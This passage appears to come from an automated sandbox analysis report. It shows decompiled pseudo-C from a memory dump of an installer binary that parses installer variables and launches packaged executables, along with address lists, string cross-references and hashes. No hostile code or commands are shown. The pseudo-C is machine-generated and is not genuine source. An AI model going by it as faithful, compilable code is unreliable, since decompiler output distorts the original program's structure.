                                                                                                                                                                  																if(_t158 < 0) {
                                                                                                                                                                  																	_push("Failed to change variant type.");
                                                                                                                                                                  																	goto L53;
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_t158 = E004020A3(_t140, _t138, _v8,  &_v28);
                                                                                                                                                                  																	if(_t158 < 0) {
                                                                                                                                                                  																		_push(_v8);
                                                                                                                                                                  																		_push("Failed to find variable value \'%ls\'.");
                                                                                                                                                                  																		goto L32;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_t152 = _v28;
                                                                                                                                                                  																		if(_t158 != 1) {
                                                                                                                                                                  																			_t115 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                  																			if( *((intOrPtr*)(_t152 * 0x30 +  *((intOrPtr*)(_t138 + 0x20)) + 0x20)) != 0) {
                                                                                                                                                                  																				_t153 = 0x80070057;
                                                                                                                                                                  																				_t158 = 0x80070057;
                                                                                                                                                                  																				E004300D9(_t115, "variable.cpp", 0x18f, 0x80070057);
                                                                                                                                                                  																				_push(_v8);
                                                                                                                                                                  																				_push("Attempt to set built-in variable value: %ls");
                                                                                                                                                                  																				L45:
                                                                                                                                                                  																				_push(_t153);
                                                                                                                                                                  																				goto L46;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				goto L34;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_t158 = E0040348A(_t140, _t138, _v8, _t152);
                                                                                                                                                                  																			if(_t158 >= 0) {
                                                                                                                                                                  																				L34:
                                                                                                                                                                  																				_t154 = _t152 * 0x30;
                                                                                                                                                                  																				 *((intOrPtr*)(_t154 +  *((intOrPtr*)(_t138 + 0x20)) + 0x18)) = _v20;
                                                                                                                                                                  																				 *((intOrPtr*)(_t154 +  *((intOrPtr*)(_t138 + 0x20)) + 0x1c)) = _v36;
                                                                                                                                                                  																				_t158 = E00418BE2( &_v52,  *((intOrPtr*)(_t138 + 0x20)) + 8 + _t154);
                                                                                                                                                                  																				if(_t158 < 0) {
                                                                                                                                                                  																					_push(_v8);
                                                                                                                                                                  																					_push("Failed to set value of variable: %ls");
                                                                                                                                                                  																					goto L32;
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_t140 = _v12;
                                                                                                                                                                  																					if(_t140 != 0) {
                                                                                                                                                                  																						 *((intOrPtr*)( *_t140 + 8))(_t140);
                                                                                                                                                                  																						_v12 = _v12 & 0x00000000;
                                                                                                                                                                  																					}
                                                                                                                                                                  																					_t156 = _a4 + 1;
                                                                                                                                                                  																					_a4 = _t156;
                                                                                                                                                                  																					if(_t156 < _v32) {
                                                                                                                                                                  																						_t151 = 0;
                                                                                                                                                                  																						continue;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				}
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_push(_v8);
                                                                                                                                                                  																				_push("Failed to insert variable \'%ls\'.");
                                                                                                                                                                  																				L32:
                                                                                                                                                                  																				_push(_t158);
                                                                                                                                                                  																				L46:
                                                                                                                                                                  																				E00430A57();
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																}
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L54;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to get next node.");
                                                                                                                                                                  							goto L53;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get variable node count.");
                                                                                                                                                                  						goto L53;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to select variable nodes.");
                                                                                                                                                                  					L53:
                                                                                                                                                                  					_push(_t158);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L54:
                                                                                                                                                                  				LeaveCriticalSection(_t138);
                                                                                                                                                                  				_t141 = _v24;
                                                                                                                                                                  				if(_t141 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t141 + 8))(_t141);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t142 = _v12;
                                                                                                                                                                  				if(_t142 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t142 + 8))(_t142);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                                  					E004380AB(_v16);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				E00418E52( &_v52);
                                                                                                                                                                  				return _t158;
                                                                                                                                                                  			}


























                                                                                                                                                                  0x00404912
                                                                                                                                                                  0x00404917
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404917
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404904
                                                                                                                                                                  0x004048c8
                                                                                                                                                                  0x004048cc
                                                                                                                                                                  0x004048ce
                                                                                                                                                                  0x004048da
                                                                                                                                                                  0x004048df
                                                                                                                                                                  0x004048df
                                                                                                                                                                  0x004048e4
                                                                                                                                                                  0x0040495a
                                                                                                                                                                  0x0040495e
                                                                                                                                                                  0x00404960
                                                                                                                                                                  0x0040496a
                                                                                                                                                                  0x0040496f
                                                                                                                                                                  0x0040496f
                                                                                                                                                                  0x00404972
                                                                                                                                                                  0x0040497c
                                                                                                                                                                  0x00404980
                                                                                                                                                                  0x00404a97
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404986
                                                                                                                                                                  0x00404993
                                                                                                                                                                  0x00404997
                                                                                                                                                                  0x00404a8a
                                                                                                                                                                  0x00404a8d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040499d
                                                                                                                                                                  0x0040499d
                                                                                                                                                                  0x004049a3
                                                                                                                                                                  0x004049c3
                                                                                                                                                                  0x004049d0
                                                                                                                                                                  0x00404a60
                                                                                                                                                                  0x00404a70
                                                                                                                                                                  0x00404a72
                                                                                                                                                                  0x00404a77
                                                                                                                                                                  0x00404a7a
                                                                                                                                                                  0x00404a7f
                                                                                                                                                                  0x00404a7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004049a5
                                                                                                                                                                  0x004049af
                                                                                                                                                                  0x004049b3
                                                                                                                                                                  0x004049d6
                                                                                                                                                                  0x004049d9
                                                                                                                                                                  0x004049df
                                                                                                                                                                  0x004049e9
                                                                                                                                                                  0x004049ff
                                                                                                                                                                  0x00404a03
                                                                                                                                                                  0x00404a53
                                                                                                                                                                  0x00404a56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404a05
                                                                                                                                                                  0x00404a05
                                                                                                                                                                  0x00404a0a
                                                                                                                                                                  0x00404a0f
                                                                                                                                                                  0x00404a12
                                                                                                                                                                  0x00404a12
                                                                                                                                                                  0x00404a19
                                                                                                                                                                  0x00404a1a
                                                                                                                                                                  0x00404a20
                                                                                                                                                                  0x00404a26
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404a26
                                                                                                                                                                  0x00404a20
                                                                                                                                                                  0x004049b5
                                                                                                                                                                  0x004049b5
                                                                                                                                                                  0x004049b8
                                                                                                                                                                  0x004049bd
                                                                                                                                                                  0x004049bd
                                                                                                                                                                  0x00404a80
                                                                                                                                                                  0x00404a80
                                                                                                                                                                  0x00404a85
                                                                                                                                                                  0x004049b3
                                                                                                                                                                  0x004049a3
                                                                                                                                                                  0x00404997
                                                                                                                                                                  0x00404980
                                                                                                                                                                  0x004048c6
                                                                                                                                                                  0x004048a6
                                                                                                                                                                  0x0040488b
                                                                                                                                                                  0x00404874
                                                                                                                                                                  0x0040486c
                                                                                                                                                                  0x0040484d
                                                                                                                                                                  0x00404832
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404817
                                                                                                                                                                  0x00404ab3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404ab3
                                                                                                                                                                  0x004047d3
                                                                                                                                                                  0x004047d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004047d3
                                                                                                                                                                  0x004047b6
                                                                                                                                                                  0x004047b6
                                                                                                                                                                  0x00404ab8
                                                                                                                                                                  0x00404ab8
                                                                                                                                                                  0x00404ab9
                                                                                                                                                                  0x00404abf
                                                                                                                                                                  0x00404ac0
                                                                                                                                                                  0x00404ac1
                                                                                                                                                                  0x00404ac7
                                                                                                                                                                  0x00404acc
                                                                                                                                                                  0x00404ad1
                                                                                                                                                                  0x00404ad1
                                                                                                                                                                  0x00404ad4
                                                                                                                                                                  0x00404ad9
                                                                                                                                                                  0x00404ade
                                                                                                                                                                  0x00404ade
                                                                                                                                                                  0x00404ae5
                                                                                                                                                                  0x00404aea
                                                                                                                                                                  0x00404aea
                                                                                                                                                                  0x00404af3
                                                                                                                                                                  0x00404af8
                                                                                                                                                                  0x00404af8
                                                                                                                                                                  0x00404b01
                                                                                                                                                                  0x00404b0c

APIs
• EnterCriticalSection.KERNEL32(?,00401E67,00000000,80070490,?,?,?,0042287C,00401EEF,?,00401F13,?,?,Chain,?,00401DDF), ref: 00404799
• LeaveCriticalSection.KERNEL32(?,?,?,?,0042287C,00401EEF,?,00401F13,?,?,Chain,?,00401DDF,00401E67,?,Log), ref: 00404AC1
Strings
• Failed to set variant value., xrefs: 00404A45
• Failed to get @Persisted., xrefs: 00404A9E
• Initializing string variable '%ls' to value '%ls', xrefs: 0040490C
• Failed to select variable nodes., xrefs: 004047B6
• Value, xrefs: 00404857
• Failed to get @Value., xrefs: 00404A4C
• Failed to set value of variable: %ls, xrefs: 00404A56
• version, xrefs: 0040491E
• Variable, xrefs: 004047A3
• Failed to find variable value '%ls'., xrefs: 00404A8D
• Type, xrefs: 00404895
• Failed to insert variable '%ls'., xrefs: 004049B8
• Failed to get variable node count., xrefs: 004047D3
• Failed to change variant type., xrefs: 00404A97
• variable.cpp, xrefs: 00404A6B
• Failed to get @Id., xrefs: 00404AAC
• Failed to get next node., xrefs: 00404AB3
• string, xrefs: 004048E9
• numeric, xrefs: 004048AE
• Failed to get @Hidden., xrefs: 00404AA5
• Persisted, xrefs: 0040483C
• Failed to get @Type., xrefs: 00404A3E
• Hidden, xrefs: 00404821
• Initializing numeric variable '%ls' to value '%ls', xrefs: 004048D4
• Initializing hidden variable '%ls', xrefs: 00404963
• Attempt to set built-in variable value: %ls, xrefs: 00404A7A
• Invalid value for @Type: %ls, xrefs: 00404A37
• Initializing version variable '%ls' to value '%ls', xrefs: 00404945
Memory Dump Source
• Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
• Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
• Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
• Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
• API String ID: 3168844106-1657652604
• Opcode ID: 53e3507a789b2dbaade2e653e71e7a6bcb659973504edf82f03922f73fdcbf78
• Instruction ID: 9cc81eaaa1381f241ff622be6af707f159127d995c5ad3ddb90b170c71993063
• Opcode Fuzzy Hash: 53e3507a789b2dbaade2e653e71e7a6bcb659973504edf82f03922f73fdcbf78
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FA1B8B1E40225BBCF119B94CC41EAEB774AB88710F21527BFA15B62D1C77C9A019F9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                  			E004195AC(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				short _v528;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v532;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v536;
                                                                                                                                                                  				char _v540;
                                                                                                                                                                  				char _v544;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v548;
                                                                                                                                                                  				char _v552;
                                                                                                                                                                  				char _v556;
                                                                                                                                                                  				intOrPtr _v560;
                                                                                                                                                                  				intOrPtr _v564;
                                                                                                                                                                  				signed short _v568;
                                                                                                                                                                  				intOrPtr _v572;
                                                                                                                                                                  				struct _PROCESS_INFORMATION _v588;
                                                                                                                                                                  				intOrPtr _v592;
                                                                                                                                                                  				intOrPtr _v596;
                                                                                                                                                                  				intOrPtr _v604;
                                                                                                                                                                  				intOrPtr _v608;
                                                                                                                                                                  				char _v612;
                                                                                                                                                                  				struct _STARTUPINFOW _v680;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t134;
                                                                                                                                                                  				signed short _t155;
                                                                                                                                                                  				signed short _t171;
                                                                                                                                                                  				signed short _t177;
                                                                                                                                                                  				signed short _t181;
                                                                                                                                                                  				signed short _t183;
                                                                                                                                                                  				signed short _t194;
                                                                                                                                                                  				intOrPtr _t205;
                                                                                                                                                                  				signed short _t218;
                                                                                                                                                                  				signed short _t225;
                                                                                                                                                                  				signed short _t232;
                                                                                                                                                                  				signed short _t239;
                                                                                                                                                                  				void* _t242;
                                                                                                                                                                  				void* _t243;
                                                                                                                                                                  				intOrPtr _t247;
                                                                                                                                                                  				void* _t248;
                                                                                                                                                                  				signed int _t249;
                                                                                                                                                                  				void* _t250;
                                                                                                                                                                  				void* _t251;
                                                                                                                                                                  				void* _t252;
                                                                                                                                                                  				void* _t253;
                                                                                                                                                                  				void* _t256;
                                                                                                                                                                  				void* _t257;
                                                                                                                                                                  
                                                                                                                                                                  				_t242 = __edx;
                                                                                                                                                                  				_t134 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t134 ^ _t249;
                                                                                                                                                                  				_v572 = _a8;
                                                                                                                                                                  				_v596 = _a12;
                                                                                                                                                                  				_t247 = _a4;
                                                                                                                                                                  				_v560 = _a16;
                                                                                                                                                                  				_v564 = _a20;
                                                                                                                                                                  				_push(0x208);
                                                                                                                                                                  				_v592 = _a24;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v528);
                                                                                                                                                                  				E004267C0(0, __ecx, _t243, _t247, __eflags);
                                                                                                                                                                  				_push(0x44);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v680);
                                                                                                                                                                  				_v568 = 0;
                                                                                                                                                                  				_v556 = 0;
                                                                                                                                                                  				_v552 = 0;
                                                                                                                                                                  				_v548 = 0;
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                  				_v540 = 0;
                                                                                                                                                                  				E004267C0(0, __ecx, _t243, _t247, __eflags);
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t251 = _t250 + 0x18;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v544 = 0;
                                                                                                                                                                  				if(E00413BE9( &_v548,  &_v612,  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0x14)),  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0x24)),  &_v548) >= 0) {
                                                                                                                                                                  					_t225 = E004314A9(_v548,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0x7c)))) + 0x18)),  &_v532);
                                                                                                                                                                  					__eflags = _t225;
                                                                                                                                                                  					if(_t225 >= 0) {
                                                                                                                                                                  						_t155 =  *((intOrPtr*)(_t247 + 0x10)) - 1;
                                                                                                                                                                  						__eflags = _t155;
                                                                                                                                                                  						if(_t155 == 0) {
                                                                                                                                                                  							_t246 =  *( *((intOrPtr*)(_t247 + 8)) + 0x9c);
                                                                                                                                                                  							L13:
                                                                                                                                                                  							__eflags = _t246;
                                                                                                                                                                  							if(_t246 == 0) {
                                                                                                                                                                  								L22:
                                                                                                                                                                  								_t246 = L"\"%ls\"";
                                                                                                                                                                  								_t225 = E00433CEA( &_v536, L"\"%ls\"", _v532);
                                                                                                                                                                  								_t252 = _t251 + 0xc;
                                                                                                                                                                  								__eflags = _t225;
                                                                                                                                                                  								if(_t225 < 0) {
                                                                                                                                                                  									L18:
                                                                                                                                                                  									_push("Failed to create executable command.");
                                                                                                                                                                  									L5:
                                                                                                                                                                  									_push(_t225);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									L57:
                                                                                                                                                                  									if(_v556 != 0) {
                                                                                                                                                                  										E004380AB(_v556);
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_v552 != 0) {
                                                                                                                                                                  										E004380AB(_v552);
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_v548 != 0) {
                                                                                                                                                                  										E004380AB(_v548);
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_v532 != 0) {
                                                                                                                                                                  										E004380AB(_v532);
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_v536 != 0) {
                                                                                                                                                                  										E004380AB(_v536);
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_v540 != 0) {
                                                                                                                                                                  										E004380AB(_v540);
                                                                                                                                                                  									}
                                                                                                                                                                  									_t248 = CloseHandle;
                                                                                                                                                                  									if(_v588.hThread != 0) {
                                                                                                                                                                  										CloseHandle(_v588.hThread);
                                                                                                                                                                  										_v588.hThread = _v588.hThread & 0x00000000;
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_v588.hProcess != 0) {
                                                                                                                                                                  										CloseHandle(_v588.hProcess);
                                                                                                                                                                  									}
                                                                                                                                                                  									return L004267AF(_t225, _v8 ^ _t249, _t246, _t248);
                                                                                                                                                                  								}
                                                                                                                                                                  								_t171 = E00433CEA( &_v540, L"\"%ls\"", _v532);
                                                                                                                                                                  								_t253 = _t252 + 0xc;
                                                                                                                                                                  								L24:
                                                                                                                                                                  								_t225 = _t171;
                                                                                                                                                                  								__eflags = _t225;
                                                                                                                                                                  								if(_t225 >= 0) {
                                                                                                                                                                  									__eflags =  *(_t247 + 0x14);
                                                                                                                                                                  									if( *(_t247 + 0x14) == 0) {
                                                                                                                                                                  										L32:
                                                                                                                                                                  										_push(_v540);
                                                                                                                                                                  										_push(_v532);
                                                                                                                                                                  										_push(E0040E2BB( *((intOrPtr*)(_t247 + 0x10))));
                                                                                                                                                                  										_push( *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)))));
                                                                                                                                                                  										E00402003(2, 0x2000012d, E0040E8FD(_v596));
                                                                                                                                                                  										_t239 =  *(_t247 + 0xc);
                                                                                                                                                                  										_t246 = SetCurrentDirectoryW;
                                                                                                                                                                  										_t251 = _t253 + 0x1c;
                                                                                                                                                                  										__eflags = _t239;
                                                                                                                                                                  										if(_t239 != 0) {
                                                                                                                                                                  											L40:
                                                                                                                                                                  											_t177 = GetCurrentDirectoryW(0x104,  &_v528);
                                                                                                                                                                  											__eflags = _t177;
                                                                                                                                                                  											if(_t177 != 0) {
                                                                                                                                                                  												_v568 = SetCurrentDirectoryW(_v548);
                                                                                                                                                                  											}
                                                                                                                                                                  											_v680.cb = 0x44;
                                                                                                                                                                  											_t181 = CreateProcessW(_v532, _v536, 0, 0, 0, 0x8000000, 0, 0,  &_v680,  &_v588);
                                                                                                                                                                  											__eflags = _t181;
                                                                                                                                                                  											if(_t181 != 0) {
                                                                                                                                                                  												__eflags =  *(_t247 + 0xc);
                                                                                                                                                                  												if( *(_t247 + 0xc) == 0) {
                                                                                                                                                                  													do {
                                                                                                                                                                  														_v612 = 2;
                                                                                                                                                                  														_v608 = 1;
                                                                                                                                                                  														_v604 = 0x32;
                                                                                                                                                                  														_t183 = _v560( &_v612, _v564);
                                                                                                                                                                  														__eflags = _t183 - 1;
                                                                                                                                                                  														if(_t183 == 1) {
                                                                                                                                                                  															goto L48;
                                                                                                                                                                  														}
                                                                                                                                                                  														__eflags = _t183;
                                                                                                                                                                  														if(_t183 != 0) {
                                                                                                                                                                  															__eflags = _t183 - 2;
                                                                                                                                                                  															_t225 = (0 | _t183 != 0x00000002) + 0x80070642;
                                                                                                                                                                  															E004300D9(_t183, "exeengine.cpp", 0x210, _t225);
                                                                                                                                                                  															_push("Bootstrapper application aborted during EXE progress.");
                                                                                                                                                                  															_push(_t225);
                                                                                                                                                                  															E00430A57();
                                                                                                                                                                  															goto L55;
                                                                                                                                                                  														}
                                                                                                                                                                  														L48:
                                                                                                                                                                  														_t225 = E00431FB6(_t239, _v588.hProcess, 0x1f4,  &_v544);
                                                                                                                                                                  														__eflags = _t225 - 0x80070102;
                                                                                                                                                                  													} while (_t225 == 0x80070102);
                                                                                                                                                                  													__eflags = _t225;
                                                                                                                                                                  													if(_t225 < 0) {
                                                                                                                                                                  														_push(_v532);
                                                                                                                                                                  														_push("Failed to wait for executable to complete: %ls");
                                                                                                                                                                  														goto L54;
                                                                                                                                                                  													}
                                                                                                                                                                  													L50:
                                                                                                                                                                  													_t225 = E00419479( *((intOrPtr*)(_t247 + 8)), _v544, _v592);
                                                                                                                                                                  													__eflags = _t225;
                                                                                                                                                                  													if(_t225 >= 0) {
                                                                                                                                                                  														goto L55;
                                                                                                                                                                  													}
                                                                                                                                                                  													E004300D9(_t189, "exeengine.cpp", 0x21b, _t225);
                                                                                                                                                                  													_push(_v544);
                                                                                                                                                                  													_push("Process returned error: 0x%x");
                                                                                                                                                                  													goto L54;
                                                                                                                                                                  												}
                                                                                                                                                                  												WaitForInputIdle(_v588, 0x1388);
                                                                                                                                                                  												goto L55;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t194 = GetLastError();
                                                                                                                                                                  												__eflags = _t194;
                                                                                                                                                                  												_t232 =  <=  ? _t194 : _t194 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												__eflags = _t232;
                                                                                                                                                                  												_t225 =  >=  ? 0x80004005 : _t232;
                                                                                                                                                                  												E004300D9(0x80004005, "exeengine.cpp", 0x200, _t225);
                                                                                                                                                                  												_push(_v532);
                                                                                                                                                                  												_push("Failed to CreateProcess on path: %ls");
                                                                                                                                                                  												L54:
                                                                                                                                                                  												_push(_t225);
                                                                                                                                                                  												E00430A57();
                                                                                                                                                                  												L55:
                                                                                                                                                                  												__eflags = _v568;
                                                                                                                                                                  												if(_v568 != 0) {
                                                                                                                                                                  													SetCurrentDirectoryW( &_v528);
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L57;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0xac)) - 1;
                                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                                  											__eflags = _t239;
                                                                                                                                                                  											if(_t239 != 0) {
                                                                                                                                                                  												goto L40;
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)) + 0xac)) - 2;
                                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                                  												goto L40;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t225 = E00424C63(_t239, _t242, __eflags, _v532, _v536, _v560, _v564,  &_v544);
                                                                                                                                                                  											__eflags = _t225;
                                                                                                                                                                  											if(_t225 >= 0) {
                                                                                                                                                                  												goto L50;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push(_v532);
                                                                                                                                                                  											_push("Failed to run netfx chainer: %ls");
                                                                                                                                                                  											L2:
                                                                                                                                                                  											_push(_t225);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  											goto L57;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t225 = E00424468(_t239, _t242, __eflags, _v532, _v536, _v560, _v564,  &_v544);
                                                                                                                                                                  										__eflags = _t225;
                                                                                                                                                                  										if(_t225 >= 0) {
                                                                                                                                                                  											goto L50;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push(_v532);
                                                                                                                                                                  										_push("Failed to run bundle as embedded from path: %ls");
                                                                                                                                                                  										goto L2;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t205 =  *((intOrPtr*)(_t247 + 8));
                                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t205 + 0xac)) - 1;
                                                                                                                                                                  									if( *((intOrPtr*)(_t205 + 0xac)) != 1) {
                                                                                                                                                                  										goto L32;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push( *(_t247 + 0x14));
                                                                                                                                                                  									_t246 = L"burn.ignoredependencies";
                                                                                                                                                                  									_push(_t246);
                                                                                                                                                                  									_t225 = E00433CEA( &_v536, L"%ls -%ls=%ls", _v536);
                                                                                                                                                                  									_t256 = _t253 + 0x14;
                                                                                                                                                                  									__eflags = _t225;
                                                                                                                                                                  									if(_t225 >= 0) {
                                                                                                                                                                  										_push( *(_t247 + 0x14));
                                                                                                                                                                  										_push(_t246);
                                                                                                                                                                  										_t225 = E00433CEA( &_v540, L"%ls -%ls=%ls", _v540);
                                                                                                                                                                  										_t253 = _t256 + 0x14;
                                                                                                                                                                  										__eflags = _t225;
                                                                                                                                                                  										if(_t225 >= 0) {
                                                                                                                                                                  											goto L32;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to append the list of dependencies to ignore to the obfuscated command line.");
                                                                                                                                                                  										goto L5;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to append the list of dependencies to ignore to the command line.");
                                                                                                                                                                  									goto L5;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to create obfuscated executable command.");
                                                                                                                                                                  								goto L5;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags =  *_t246;
                                                                                                                                                                  							if( *_t246 == 0) {
                                                                                                                                                                  								goto L22;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t225 = E00403A92(_v572, _t246,  &_v556, 0);
                                                                                                                                                                  							__eflags = _t225;
                                                                                                                                                                  							if(_t225 >= 0) {
                                                                                                                                                                  								_push(_v556);
                                                                                                                                                                  								_t225 = E00433CEA( &_v536, L"\"%ls\" %s", _v532);
                                                                                                                                                                  								_t257 = _t251 + 0x10;
                                                                                                                                                                  								__eflags = _t225;
                                                                                                                                                                  								if(_t225 >= 0) {
                                                                                                                                                                  									_t225 = E00403AAC(_v572, _t246,  &_v552, 0);
                                                                                                                                                                  									__eflags = _t225;
                                                                                                                                                                  									if(_t225 >= 0) {
                                                                                                                                                                  										_push(_v552);
                                                                                                                                                                  										_t171 = E00433CEA( &_v540, L"\"%ls\" %s", _v532);
                                                                                                                                                                  										_t253 = _t257 + 0x10;
                                                                                                                                                                  										goto L24;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to format obfuscated argument string.");
                                                                                                                                                                  									goto L5;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to format argument string.");
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t218 = _t155 - 1;
                                                                                                                                                                  						__eflags = _t218;
                                                                                                                                                                  						if(_t218 == 0) {
                                                                                                                                                                  							_t246 =  *( *((intOrPtr*)(_t247 + 8)) + 0x94);
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _t218 == 3;
                                                                                                                                                                  						if(_t218 == 3) {
                                                                                                                                                                  							_t246 =  *( *((intOrPtr*)(_t247 + 8)) + 0x98);
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t225 = 0x8000ffff;
                                                                                                                                                                  						_push("Failed to get action arguments for executable package.");
                                                                                                                                                                  						goto L5;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to build executable path.");
                                                                                                                                                                  					goto L5;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_t247 + 8)))));
                                                                                                                                                                  				_push("Failed to get cached path for package: %ls");
                                                                                                                                                                  				goto L2;
                                                                                                                                                                  			}

















































                                                                                                                                                                  0x004198b6
                                                                                                                                                                  0x004198f6
                                                                                                                                                                  0x004198f8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004198fd
                                                                                                                                                                  0x00419904
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041992a
                                                                                                                                                                  0x0041992c
                                                                                                                                                                  0x0041992e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
